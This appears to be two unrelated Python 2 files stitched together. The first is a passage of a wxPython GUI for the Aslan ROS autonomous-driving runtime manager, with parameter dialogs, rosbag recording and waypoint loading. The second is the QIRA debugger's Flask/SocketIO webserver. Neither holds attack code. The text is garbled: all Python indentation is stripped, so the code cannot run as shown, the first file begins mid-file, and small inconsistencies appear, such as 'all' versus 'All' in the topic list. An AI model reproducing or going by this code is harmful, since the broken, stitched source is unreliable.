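#   msg_path_to_obj_attr(msg, 'data')          -> (msg, 'data')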
def str_to_rosval(s, type_str, def_ret=None):
cvt_dic = {
'int8': int, 'int16': int, 'int32': int,
'uint8': int, 'uint16': int, 'uint32': int,
'int64': long, 'uint64': long,
'float32': float, 'float64': float,
}
t = cvt_dic.get(type_str)
s = s.replace(',', '.') if t is float and type(s) is str else s
return t(s) if t else def_ret
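# Example (illustrative): converts a string to the Python type matching a ROS
# field type, tolerating a European decimal comma for floats:
#   str_to_rosval('1,5', 'float32')        -> 1.5
#   str_to_rosval('42', 'int32')           -> 42
#   str_to_rosval('abc', 'string', 'abc')  -> 'abc' (unmapped types: def_ret)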
def adjust_num_str(s):
if '.' in s:
while s[-1] == '0':
s = s[:-1]
if s[-1] == '.':
s = s[:-1]
return s
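# Example (illustrative): trims trailing zeros, and a then-bare decimal point,
# from numeric strings bound for the command line:
#   adjust_num_str('1.500')  -> '1.5'
#   adjust_num_str('2.000')  -> '2'
#   adjust_num_str('100')    -> '100' (no dot, unchanged)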
def dic_getset(dic, key, def_ret):
if key not in dic:
dic[key] = def_ret
return dic.get(key)
def eval_if_str(self, v):
return eval(v) if type(v) is str else v
def dic_eval_if_str(self, dic, key, def_ret=None):
return eval_if_str(self, dic.get(key, def_ret))
def gdic_dialog_name_get(gdic):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
return gdic.get(dlg_type + '_dialog', gdic.get('dialog', 'MyDialogParam'))
def gdic_dialog_type_chk(gdic, name):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
tail = '_dialog_only'
lst = [(k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail]
only_chk = next((False for (k, type) in lst if type != dlg_type and name in gdic.get(k, [])), True)
tail = '_dialog_allow'
lst = [(k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail]
allow_chk = next((False for (k, type) in lst if type == dlg_type and name not in gdic.get(k, [])), True)
return only_chk and allow_chk
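# Illustrative semantics: a var is shown for the current dialog_type unless
# some other type claims it via a '<type>_dialog_only' list, or the current
# type has a '<type>_dialog_allow' list that omits it. E.g. with
# gdic = {'open_dialog_only': ['pcd_file']}, 'pcd_file' appears in 'open'
# dialogs but is hidden from 'config' dialogs.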
def str_to_float(s):
return float(s.replace(',', '.'))
class StrValObj:
def __init__(self, s, v):
self.s = s
self.v = v
def GetValue(self):
return self.v
def SetValue(self, v):
self.v = v
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, wx.ID_ANY, "")
self.SetTopWindow(frame_1)
# buttons_color_hdr_setup(frame_1)
frame_1.Show()
return 1
class MyDialogROSbagRecord(aslan_gui.MyDialogROSbagRecord):
def __init__(self, *args, **kwds):
self.cmd_dic = kwds.pop('cmd_dic')
aslan_gui.MyDialogROSbagRecord.__init__(self, *args, **kwds)
self.cbs = []
self.refresh()
self.parent = self.GetParent()
self.cmd_dic[self.button_start] = ('rosbag record', None)
self.toggles = [self.button_start, self.button_stop]
def OnRef(self, event):
tc = self.text_ctrl
file_dialog(self, tc, {'path_type': 'save'})
def OnStart(self, event):
key_obj = self.button_start
path = self.text_ctrl.GetValue()
if path == '':
print('path=""')
return
topic_opt = []
if self.cbs[0].GetValue(): # 'All'
topic_opt = ['-a']
else:
for obj in self.cbs:
if obj.GetValue():
topic_opt += [obj.GetLabel()]
if not topic_opt:
print('topic=[]')
return
args = topic_opt + ['-O', path]
split_arg = ['--split'] if self.checkbox_split.GetValue() else []
size_arg = self.size_arg_get()
if split_arg and not size_arg:
wx.MessageBox('size is required, with split')
return
args += split_arg + size_arg
(cmd, proc) = self.cmd_dic[key_obj]
proc = self.parent.launch_kill(True, cmd, proc, add_args=args, obj=key_obj, kill_children=True)
self.cmd_dic[key_obj] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
def OnStop(self, event):
key_obj = self.button_start
(cmd, proc) = self.cmd_dic[key_obj]
proc = self.parent.launch_kill(False, cmd, proc, sigint=True, obj=key_obj, kill_children=True)
self.cmd_dic[key_obj] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
self.Hide()
def OnRefresh(self, event):
self.refresh()
def refresh(self):
lst = ['all'] + subprocess.check_output(['rostopic', 'list']).strip().split('\n')
panel = self.panel_1
szr = self.sizer_topic
for obj in self.cbs:
szr.Remove(obj)
obj.Destroy()
self.cbs = []
for topic in lst:
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
bdr = 4 if topic == 'All' else 4 * 4
szr.Add(obj, 0, wx.LEFT, bdr)
self.cbs.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
def show(self):
self.Show()
self.update_filename()
def update_filename(self):
tc = self.text_ctrl
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'aslan-%04d%02d%02d%02d%02d%02d' % (
now.year, now.month, now.day, now.hour, now.minute, now.second)
path = os.path.join(dn, fn)
set_path(tc, path)
def size_arg_get(self):
tc = self.text_ctrl_size
s = tc.GetValue()
mb = 0
try:
mb = str_to_float(s)
except ValueError:
mb = 0
if mb <= 0:
tc.SetValue('')
return ['--size=' + str(int(mb * 1024 * 1024))] if mb > 0 else []
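# Example (illustrative): the size box is read as megabytes and scaled by
# 1024*1024 before being handed to rosbag record as --size, e.g.
#   '1.5'  -> ['--size=1572864']
# A non-positive or unparsable value clears the box and yields no argument.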
class ParamPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.frame = kwds.pop('frame')
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
wx.Panel.__init__(self, *args, **kwds)
self.gdic['param_panel'] = self
obj = self.frame.cfg_prm_to_obj({'pdic': self.pdic, 'gdic': self.gdic, 'param': self.prm})
(_, _, proc) = self.frame.obj_to_cmd_dic_cmd_proc(obj)
hszr = None
self.vps = []
self.tmp_msg = None
szr = wx.BoxSizer(wx.VERTICAL)
topic_szrs = (None, None)
vars = self.prm.get('vars')
if self.gdic.get('show_order'):
var_lst = lambda name, vars: [var for var in vars if var.get('name') == name]
vars = reduce(lambda lst, name: lst + var_lst(name, vars), self.gdic.get('show_order'), [])
for var in vars:
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
bak_stk_push(gdic_v, 'func')
if gdic_v.get('func'):
continue
v = self.pdic.get(name, var.get('v'))
vp = VarPanel(self, var=var, v=v, update=self.update)
vp.setup_tooltip()
self.vps.append(vp)
gdic_v['var'] = vp
gdic_v['func'] = vp.get_v
prop = gdic_v.get('prop', 0)
border = gdic_v.get('border', 0)
flag = wx_flag_get(gdic_v.get('flags', []))
do_category = 'no_category' not in gdic_v.get('flags', [])
if do_category and self.in_msg(var):
bak = (szr, hszr)
(szr, hszr) = topic_szrs
if szr is None:
szr = static_box_sizer(self, 'topic : ' + self.prm.get('topic'))
bak[0].Add(szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = szr
if vp.is_nl():
hszr = None  # full-width items start a fresh row
flag |= wx.EXPAND
else:
if hszr is None:
hszr = wx.BoxSizer(wx.HORIZONTAL)
szr.Add(hszr, 0, wx.EXPAND)
flag |= wx.ALIGN_CENTER_VERTICAL
targ_szr = hszr
if do_category and 'rosparam' in var:
rp_szr = static_box_sizer(self, var.get('rosparam'))
targ_szr.Add(rp_szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = rp_szr
user_category = gdic_v.get('user_category')
if user_category is not None and hszr:
user_szr = static_box_sizer(self, user_category, orient=wx.HORIZONTAL)
(flgs, bdr) = gdic_v.get('user_category_add', [[], 0])
targ_szr.Add(user_szr, 0, wx_flag_get(flgs), bdr)
targ_szr = hszr = user_szr
targ_szr.Add(vp, prop, flag, border)
if 'nl' in gdic_v.get('flags', []):
hszr = None
if do_category and self.in_msg(var):
topic_szrs = (szr, hszr)
(szr, hszr) = bak
if 'hline' in gdic_v.get('flags', []) and hszr is None:
szr.Add(wx.StaticLine(self, wx.ID_ANY), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 4)
if not self.in_msg(var) and var.get('rosparam'):
k = 'ext_toggle_enables'
self.gdic[k] = self.gdic.get(k, []) + [vp]
enables_set(vp, 'toggle', proc is None)
if 'disable' in gdic_v.get('flags', []):
vp.Enable(False)
if 'hide' in gdic_v.get('flags', []):
vp.Hide()
self.SetSizer(szr)
if 'no_init_update' not in self.prm.get('flags', []):
self.update()
def get_gdic_v_and_chk_enable(self, var_name):
gdic_v = dic_getset(self.gdic, var_name, {})
if 'panel' in gdic_v and dic_eval_if_str(self.frame, gdic_v, 'panel') != self.GetParent():
return None
return gdic_v
def update(self, var=None):
update_func = self.gdic.get('update_func')
if update_func:
self.gdic['update_func_arg_var'] = var
update_func(self.pdic, self.gdic, self.prm)
def detach_func(self):
for var in self.prm.get('vars'):
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
if 'func' in gdic_v:
bak_stk_pop(gdic_v, 'func')
vp = gdic_v.get('var')
lst_remove_once(self.gdic.get('ext_toggle_enables', []), vp)
def in_msg(self, var):
if 'topic' not in self.prm or 'msg' not in self.prm:
return False
if self.tmp_msg is None:
klass_msg = globals().get(self.prm.get('msg'))
if klass_msg is None:
return False
self.tmp_msg = klass_msg()
(obj, attr) = msg_path_to_obj_attr(self.tmp_msg, var.get('name'))
return obj and attr in obj.__slots__
class VarPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.var = kwds.pop('var')
v = kwds.pop('v')
self.update = kwds.pop('update')
wx.Panel.__init__(self, *args, **kwds)
self.min = self.var.get('min')
self.max = self.var.get('max')
self.has_slider = self.min is not None and self.max is not None
self.lb = None
label = self.var.get('label', '')
self.kind = self.var.get('kind')
if self.kind == 'radio_box':
choices = self.var.get('choices', [])
style = wx.RA_SPECIFY_COLS if self.var.get('choices_style') == 'h' else wx.RA_SPECIFY_ROWS
self.obj = wx.RadioBox(self, wx.ID_ANY, label, choices=choices, majorDimension=0, style=style)
self.choices_sel_set(v)
self.Bind(wx.EVT_RADIOBOX, self.OnUpdate, self.obj)
return
if self.kind == 'menu':
choices = self.var.get('choices', [])
self.obj = wx.Choice(self, wx.ID_ANY, choices=choices)
self.choices_sel_set(v)
self.Bind(wx.EVT_CHOICE, self.OnUpdate, self.obj)
if label:
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
if self.kind == 'checkbox':
self.obj = wx.CheckBox(self, wx.ID_ANY, label)
self.obj.SetValue(v)
self.Bind(wx.EVT_CHECKBOX, self.OnUpdate, self.obj)
return
if self.kind == 'checkboxes':
item_n = dic_eval_if_str(self, self.var, 'item_n', 1)
self.obj = Checkboxes(self, item_n, label)
self.obj.set(v)
for box in self.obj.boxes:
self.obj.Bind(wx.EVT_CHECKBOX, self.OnUpdate, box)
return
if self.kind == 'toggle_button':
self.obj = wx.ToggleButton(self, wx.ID_ANY, label)
set_val(self.obj, v)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnUpdate, self.obj)
button_color_hdr_setup(self.obj)
return
if self.kind == 'hide':
self.Hide()
return
if self.kind == 'topic':
topic_type = self.var.get('topic_type')
topics = self._get_topics_by_type(topic_type)
self.obj = wx.ComboBox(self, id=wx.ID_ANY, value=v, choices=topics, style=wx.CB_DROPDOWN, size=(130, -1))
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
szr = wx.BoxSizer(wx.HORIZONTAL)
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
szr.Add(self.lb, 0, flag, 4)
if self.kind == 'path':
v = str(v)
v = path_expand_cmd(v)
v = os.path.expandvars(os.path.expanduser(v))
style = wx.TE_PROCESS_ENTER + wx_flag_get(self.var.get('str_flags', []))
self.tc = wx.TextCtrl(self, wx.ID_ANY, str(v), style=style, size=(130, -1))
self.Bind(wx.EVT_TEXT_ENTER, self.OnUpdate, self.tc)
if self.kind in ('num', None):
if self.has_slider:
self.w = self.max - self.min
vlst = [v, self.min, self.max, self.var['v']]
self.is_float = len([v_ for v_ in vlst if type(v_) is not int]) > 0
self.int_max = 1000 if self.is_float else self.max
self.int_min = 0 if self.is_float else self.min
self.slider = wx.Slider(self, wx.ID_ANY, self.get_int_v(), self.int_min, self.int_max)
self.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll, self.slider)
self.slider.SetMinSize((82, 27))
szr.Add(self.slider, 1, wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, 4)
else:
self.is_float = type(self.var['v']) is not int
self.tc.SetMinSize((40, 27))
flag = wx.ALIGN_CENTER_VERTICAL
prop = 1 if self.kind == 'path' or self.kind == 'str' else 0
szr.Add(self.tc, prop, flag, 4)
if self.kind == 'path':
self.ref = wx.Button(self, wx.ID_ANY, 'File')
self.Bind(wx.EVT_BUTTON, self.OnRef, self.ref)
button_color_hdr_setup(self.ref)
self.ref.SetMinSize((40, 29))
szr.Add(self.ref, 0, flag, 4)
if self.has_slider or self.kind == 'num':
vszr = wx.BoxSizer(wx.VERTICAL)
szr.Add(vszr, 0, wx.ALIGN_CENTER_VERTICAL)
self.SetSizer(szr)
def _get_topics_by_type(self, message_type):
# get list of current available topics:
ros_topics = rospy.get_published_topics()
matched_topics = list(filter(lambda x: x[1] == message_type, ros_topics))
topic_names = [x[0] for x in matched_topics]
topic_names.sort()
return topic_names
def setup_tooltip(self):
if get_tooltips(self.var):
set_tooltips(self.obj, self.var)
if get_tooltip(self.var):
obj = self.lb if self.lb else (self if self.kind == 'radio_box' else self.obj)
set_tooltip(obj, self.var)
def get_v(self):
if self.kind in ['radio_box', 'menu']:
return self.choices_sel_get()
if self.kind in ['checkbox', 'toggle_button', 'topic']:
return self.obj.GetValue()
if self.kind == 'checkboxes':
return self.obj.get()
if self.kind == 'hide':
return self.var.get('v')
if self.kind in ['path', 'str']:
return str(self.tc.GetValue())
if not self.has_slider and self.tc.GetValue() == '':
return ''
return self.get_tc_v()
def get_tc_v(self):
s = self.tc.GetValue()
v = str_to_float(s) if self.is_float else int(s)
if self.has_slider:
v = self.min if v < self.min else v
v = self.max if v > self.max else v
self.tc.SetValue(adjust_num_str(str(v)))
return v
def get_int_v(self):
v = self.get_tc_v()
if self.is_float:
v = int(self.int_max * (v - self.min) / self.w if self.w != 0 else 0)
return v
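# Illustrative: float sliders ride an integer 0..1000 track; get_int_v maps
# the current text value onto it, e.g. min=0.0, max=2.0, v=0.5 gives
# int(1000 * (0.5 - 0.0) / 2.0) == 250.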
def OnScroll(self, event):
iv = self.slider.GetValue()
s = str(iv)
if self.is_float:
v = self.min + float(self.w) * iv / self.int_max
s = str(Decimal(v).quantize(Decimal(str(self.get_step()))))
self.tc.SetValue(s)
self.update(self.var)
def get_step(self):
step = self.var.get('step')
return step if step else 0.01 if self.is_float else 1
def OnUpdate(self, event):
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnRef(self, event):
if file_dialog(self, self.tc, self.var) == wx.ID_OK:
self.update(self.var)
def choices_sel_get(self):
return self.obj.GetStringSelection() if self.var.get('choices_type') == 'str' else self.obj.GetSelection()
def choices_sel_set(self, v):
if self.var.get('choices_type') == 'str':
self.obj.SetStringSelection(v)
else:
self.obj.SetSelection(v)
def is_nl(self):
return self.has_slider or self.kind in ['path']
class MyDialogParam(aslan_gui.MyDialogParam):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
aslan_gui.MyDialogParam.__init__(self, *args, **kwds)
set_size_gdic(self, gdic)
self.Bind(wx.EVT_CLOSE, self.OnClose)
ok_lb_key = 'open_dialog_ok_label'
if dic_list_get(gdic, 'dialog_type', 'config') == 'open' and ok_lb_key in gdic:
self.button_1.SetLabel(gdic.get(ok_lb_key))
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w, h) = self.GetSize()
(w2, _) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2, h))
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class BarLabel(wx.Panel):
def __init__(self, parent, txt='', pos=wx.DefaultPosition, size=wx.DefaultSize, style=0, hv=wx.HORIZONTAL,
show_lb=True):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lb = wx.StaticText(self, wx.ID_ANY, '', style=style)
self.txt = txt
self.hv = hv
self.dir = wx.SOUTH if hv == wx.HORIZONTAL else wx.EAST
self.show_lb = show_lb
self.prg = -1
self.dflt_col1 = wx.Colour(250, 250, 250)
self.dflt_col2 = wx.Colour(128, 128, 128)
self.col1 = self.dflt_col1
self.col2 = self.dflt_col2
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, prg):
self.prg = prg
if self.show_lb:
self.lb.SetLabel(self.txt + str(prg) + '%' if prg >= 0 else '')
self.Refresh()
def set_col(self, col1, col2):
self.col1 = col1 if col1 != wx.NullColour else self.dflt_col1
self.col2 = col2 if col2 != wx.NullColour else self.dflt_col2
def clear(self):
self.set(-1)
def OnPaint(self, event):
dc = wx.PaintDC(self)
(w, h) = self.GetSize()
h = 15
if self.IsEnabled():
p = (w if self.hv == wx.HORIZONTAL else h) * self.prg / 100
rect = wx.Rect(0, 0, p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, h - p, w, p)
dc.GradientFillLinear(rect, self.col1, self.col2, self.dir)
rect = wx.Rect(p, 0, w - p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, 0, w, h - p)
dc.GradientFillLinear(rect, wx.Colour(200, 200, 200), wx.Colour(250, 250, 250), self.dir)
else:
rect = wx.Rect(0, 0, w, h)
dc.GradientFillLinear(rect, wx.Colour(250, 250, 250), wx.Colour(250, 250, 250), self.dir)
class Checkboxes(wx.Panel):
def __init__(self, parent, item_n, lb):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.boxes = [wx.CheckBox(self, wx.ID_ANY, lb + str(i)) for i in range(item_n)]
vsz = wx.BoxSizer(wx.VERTICAL)
for j in range((item_n + 7) / 8):
hsz = wx.BoxSizer(wx.HORIZONTAL)
for i in range(8):
idx = j * 8 + i
if idx < len(self.boxes):
hsz.Add(self.boxes[idx], 0, wx.LEFT, 8)
vsz.Add(hsz)
self.SetSizer(vsz)
vsz.Fit(self)
def set(self, vs):
vs = vs if vs else [True for box in self.boxes]
for (box, v) in zip(self.boxes, vs):
box.SetValue(v)
def get(self):
return [box.GetValue() for box in self.boxes]
class MyDialogNDTMapping(aslan_gui.MyDialogNDTMapping):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.pdic_bak = self.pdic.copy()
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
aslan_gui.MyDialogNDTMapping.__init__(self, *args, **kwds)
set_size_gdic(self)
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=self.pdic, gdic=self.gdic, prm=self.prm)
sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.update_filename()
self.klass_msg = ConfigNDTMappingOutput
self.pub = rospy.Publisher('/config/ndt_mapping_output', self.klass_msg, queue_size=10)
def update_filename(self):
tc = self.text_ctrl_path
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'aslan-%02d%02d%02d.pcd' % (
now.year % 100, now.month, now.day)
path = os.path.join(dn, fn)
set_path(tc, path)
def OnRef(self, event):
tc = self.text_ctrl_path
file_dialog(self, tc, {'path_type': 'save'})
def OnRadio(self, event):
v = self.radio_btn_filter_resolution.GetValue()
tc = self.text_ctrl_filter_resolution
tc.Enable(v)
def OnPcdOutput(self, event):
tc = self.text_ctrl_filter_resolution
v = tc.GetValue() if self.radio_btn_filter_resolution.GetValue() else '0.0'
msg = self.klass_msg()
msg.filename = self.text_ctrl_path.GetValue()
msg.filter_res = str_to_float(v)
self.pub.publish(msg)
def OnOk(self, event):
self.panel.detach_func()
self.EndModal(0)
class MyDialogWaypointLoader(aslan_gui.MyDialogWaypointLoader):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.pdic_bak = self.pdic.copy()
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
aslan_gui.MyDialogWaypointLoader.__init__(self, *args, **kwds)
set_size_gdic(self)
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=self.pdic, gdic=self.gdic, prm=self.prm)
sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.klass_msg = Bool
self.pub = rospy.Publisher('/config/waypoint_loader_output', self.klass_msg, queue_size=10)
def OnCsvOutput(self, event):
msg = self.klass_msg()
msg.data = True
self.pub.publish(msg)
def OnOk(self, event):
self.panel.detach_func()
self.EndModal(0)
if __name__ == "__main__":
gettext.install("app")
app = MyApp(0)
app.MainLoop()
|
qira_webserver.py
|
from qira_base import *
import qira_config
import os
import sys
import time
import base64
import json
sys.path.append(qira_config.BASEDIR+"/static2")
import model
def socket_method(func):
def func_wrapper(*args, **kwargs):
# before things are initted in the js, we get this
for i in args:
if i == None:
#print "BAD ARGS TO %-20s" % (func.func_name), "with",args
return
try:
start = time.time()
ret = func(*args, **kwargs)
tm = (time.time() - start) * 1000
# print slow calls, slower than 50ms
if tm > 50 or qira_config.WEBSOCKET_DEBUG:
print "SOCKET %6.2f ms in %-20s with" % (tm, func.func_name), args
return ret
except Exception, e:
print "ERROR",e,"in",func.func_name,"with",args
return func_wrapper
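# Illustrative: socket_method is stacked under the @socketio.on(...) handlers
# below; it drops events carrying any None argument (sent by the JS side
# before it is initialized), times every call, and logs calls slower than
# 50 ms in the form
#   SOCKET  62.31 ms in getinstructions     with (1, 5000, 4950, 5050)
# (hypothetical numbers).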
import qira_socat
import time
import qira_analysis
import qira_log
LIMIT = 0
from flask import Flask, Response, redirect, request
from flask_socketio import SocketIO, emit
# http://stackoverflow.com/questions/8774958/keyerror-in-module-threading-after-a-successful-py-test-run
import threading
import sys
if 'threading' in sys.modules:
del sys.modules['threading']
import gevent
import gevent.socket
import gevent.monkey
gevent.monkey.patch_all()
# done with that
app = Flask(__name__)
#app.config['DEBUG'] = True
socketio = SocketIO(app)
# ***** middleware moved here *****
def push_trace_update(i):
t = program.traces[i]
if t.picture != None:
#print t.forknum, t.picture
socketio.emit('setpicture', {"forknum":t.forknum, "data":t.picture,
"minclnum":t.minclnum, "maxclnum":t.maxclnum}, namespace='/qira')
socketio.emit('strace', {'forknum': t.forknum, 'dat': t.strace}, namespace='/qira')
t.needs_update = False
def push_updates(full = True):
socketio.emit('pmaps', program.get_pmaps(), namespace='/qira')
socketio.emit('maxclnum', program.get_maxclnum(), namespace='/qira')
socketio.emit('arch', list(program.tregs), namespace='/qira')
if not full:
return
for i in program.traces:
push_trace_update(i)
def mwpoll():
# poll for new traces, call this every once in a while
for i in os.listdir(qira_config.TRACE_FILE_BASE):
if "_" in i:
continue
i = int(i)
if i not in program.traces:
program.add_trace(qira_config.TRACE_FILE_BASE+str(i), i)
did_update = False
# poll for updates on existing
for tn in program.traces:
if program.traces[tn].db.did_update():
t = program.traces[tn]
t.read_strace_file()
socketio.emit('strace', {'forknum': t.forknum, 'dat': t.strace}, namespace='/qira')
did_update = True
# trace specific stuff
if program.traces[tn].needs_update:
push_trace_update(tn)
if did_update:
program.read_asm_file()
push_updates(False)
def mwpoller():
while 1:
time.sleep(0.2)
mwpoll()
# ***** after this line is the new server stuff *****
@socketio.on('forkat', namespace='/qira')
@socket_method
def forkat(forknum, clnum, pending):
global program
print "forkat",forknum,clnum,pending
REGSIZE = program.tregs[1]
dat = []
for p in pending:
daddr = fhex(p['daddr'])
ddata = fhex(p['ddata'])
if len(p['ddata']) > 4:
# ugly hack
dsize = REGSIZE
else:
dsize = 1
flags = qira_log.IS_VALID | qira_log.IS_WRITE
if daddr >= 0x1000:
flags |= qira_log.IS_MEM
flags |= dsize*8
dat.append((daddr, ddata, clnum-1, flags))
next_run_id = qira_socat.get_next_run_id()
if len(dat) > 0:
qira_log.write_log(qira_config.TRACE_FILE_BASE+str(next_run_id)+"_mods", dat)
if args.server:
qira_socat.start_bindserver(program, qira_config.FORK_PORT, forknum, clnum)
else:
if os.fork() == 0:
program.execqira(["-qirachild", "%d %d %d" % (forknum, clnum, next_run_id)])
@socketio.on('deletefork', namespace='/qira')
@socket_method
def deletefork(forknum):
global program
print "deletefork", forknum
os.unlink(qira_config.TRACE_FILE_BASE+str(int(forknum)))
del program.traces[forknum]
push_updates()
@socketio.on('doslice', namespace='/qira')
@socket_method
def slice(forknum, clnum):
trace = program.traces[forknum]
data = qira_analysis.slice(trace, clnum)
print "slice",forknum,clnum, data
emit('slice', forknum, data)
@socketio.on('doanalysis', namespace='/qira')
@socket_method
def analysis(forknum):
trace = program.traces[forknum]
data = qira_analysis.get_vtimeline_picture(trace)
if data != None:
emit('setpicture', {"forknum":forknum, "data":data})
@socketio.on('connect', namespace='/qira')
@socket_method
def connect():
global program
print "client connected", program.get_maxclnum()
push_updates()
@socketio.on('getclnum', namespace='/qira')
@socket_method
def getclnum(forknum, clnum, types, limit):
trace = program.traces[forknum]
ret = []
for c in trace.db.fetch_changes_by_clnum(clnum, LIMIT):
if c['type'] not in types:
continue
c = c.copy()
c['address'] = ghex(c['address'])
c['data'] = ghex(c['data'])
ret.append(c)
if len(ret) >= limit:
break
emit('clnum', ret)
@socketio.on('getchanges', namespace='/qira')
@socket_method
def getchanges(forknum, address, typ, cview, cscale, clnum):
if forknum != -1 and forknum not in program.traces:
return
address = fhex(address)
if forknum == -1:
forknums = program.traces.keys()
else:
forknums = [forknum]
ret = {}
for forknum in forknums:
db = program.traces[forknum].db.fetch_clnums_by_address_and_type(address, chr(ord(typ[0])), cview[0], cview[1], LIMIT)
# send the clnum and the bunch closest on each side
if len(db) > 50:
send = set()
bisect = 0
last = None
cnt = 0
for cl in db:
if cl <= clnum:
bisect = cnt
cnt += 1
if last != None and (cl - last) < cscale:
continue
send.add(cl)
last = cl
add = db[max(0,bisect-4):min(len(db), bisect+5)]
#print bisect, add, clnum
for tmp in add:
send.add(tmp)
ret[forknum] = list(send)
else:
ret[forknum] = db
emit('changes', {'type': typ, 'clnums': ret})
@socketio.on('navigatefunction', namespace='/qira')
@socket_method
def navigatefunction(forknum, clnum, start):
trace = program.traces[forknum]
myd = trace.dmap[clnum]
ret = clnum
while 1:
if trace.dmap[clnum] == myd-1:
break
ret = clnum
if start:
clnum -= 1
else:
clnum += 1
if clnum == trace.minclnum or clnum == trace.maxclnum:
ret = clnum
break
emit('setclnum', {'forknum': forknum, 'clnum': ret})
@socketio.on('getinstructions', namespace='/qira')
@socket_method
def getinstructions(forknum, clnum, clstart, clend):
trace = program.traces[forknum]
slce = qira_analysis.slice(trace, clnum)
ret = []
def get_instruction(i):
rret = trace.db.fetch_changes_by_clnum(i, 1)
if len(rret) == 0:
return None
else:
rret = rret[0]
instr = program.static[rret['address']]['instruction']
rret['instruction'] = instr.__str__(trace, i) #i == clnum
# check if static fails at this
if rret['instruction'] == "":
# TODO: wrong place to get the arch
arch = program.static[rret['address']]['arch']
# we have the address and raw bytes, disassemble
raw = trace.fetch_raw_memory(i, rret['address'], rret['data'])
rret['instruction'] = str(model.Instruction(raw, rret['address'], arch))
#display_call_args calls make_function_at
if qira_config.WITH_STATIC:
if instr.is_call():
args = qira_analysis.display_call_args(instr,trace,i)
if args != "":
rret['instruction'] += " {"+args+"}"
if 'name' in program.static[rret['address']]:
#print "setting name"
rret['name'] = program.static[rret['address']]['name']
if 'comment' in program.static[rret['address']]:
rret['comment'] = program.static[rret['address']]['comment']
if i in slce:
rret['slice'] = True
else:
rret['slice'] = False
# for numberless javascript
rret['address'] = ghex(rret['address'])
try:
rret['depth'] = trace.dmap[i - trace.minclnum]
except:
rret['depth'] = 0
# hack to only display calls
if True or instr.is_call():
#if instr.is_call():
return rret
else:
return None
top = []
clcurr = clnum-1
while len(top) != (clnum - clstart) and clcurr >= 0:
rret = get_instruction(clcurr)
    if rret is not None:
top.append(rret)
clcurr -= 1
clcurr = clnum
while len(ret) != (clend - clnum) and clcurr <= clend:
rret = get_instruction(clcurr)
    if rret is not None:
ret.append(rret)
clcurr += 1
ret = top[::-1] + ret
emit('instructions', ret)
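# How the window above is assembled (summary of the two loops, nothing new):
# `top` walks backwards from clnum-1 towards clstart, `ret` walks forward from
# clnum to clend, and `top` is reversed and prepended so the emitted list is in
# ascending clnum order around the current change number.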
@socketio.on('getmemory', namespace='/qira')
@socket_method
def getmemory(forknum, clnum, address, ln):
trace = program.traces[forknum]
address = fhex(address)
dat = trace.fetch_memory(clnum, address, ln)
ret = {'address': ghex(address), 'len': ln, 'dat': dat, 'is_big_endian': program.tregs[2], 'ptrsize': program.tregs[1]}
emit('memory', ret)
